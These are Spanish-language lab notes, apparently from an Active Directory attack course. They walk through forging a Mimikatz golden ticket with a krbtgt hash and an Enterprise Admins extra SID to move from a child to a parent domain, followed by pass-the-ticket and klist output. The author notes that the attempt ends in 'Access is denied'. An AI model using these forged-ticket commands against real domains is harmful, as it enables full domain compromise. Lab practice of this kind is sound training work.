Learning Objective - 19

Child to Parent using krbtgt hash

Ejecutamos en el mimikatz utilizando el hash del krbtgt.

PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ticket" "exit"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ticket
User      : Administrator
Domain    : dollarcorp.moneycorp.local (DOLLARCORP)
SID       : S-1-5-21-719815819-3726368948-3917688648
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-335606122-960912869-3279953914-519 ;
ServiceKey: 4e9815869d2090ccfca61c1fe0d23986 - rc4_hmac_nt
Lifetime  : 3/4/2024 1:10:49 AM ; 3/2/2034 1:10:49 AM ; 3/2/2034 1:10:49 AM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(powershell) # exit
Bye!

Luego cargamos el ticket.

PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::ptt ticket.kirbi

* File: 'ticket.kirbi': OK

PS C:\AD\Tools\tickets> klist

Current LogonId is 0:0xe922452

Cached Tickets: (1)

#0>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 3/4/2024 1:10:49 (local)
        End Time:   3/2/2034 1:10:49 (local)
        Renew Time: 3/2/2034 1:10:49 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
PS C:\AD\Tools\tickets>

no funciona :c, debo ver porque esta fallando, Tal vez envio correo.

C:\AD\Tools>klist

Current LogonId is 0:0x43d8c

Cached Tickets: (1)

#0>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 3/4/2024 1:56:14 (local)
        End Time:   3/2/2034 1:56:14 (local)
        Renew Time: 3/2/2034 1:56:14 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

C:\AD\Tools>dir \\mcorp-dc.moneycorp.local\c$
Access is denied.

C:\AD\Tools>klist

Current LogonId is 0:0x43d8c

Cached Tickets: (0)

C:\AD\Tools>

Last updated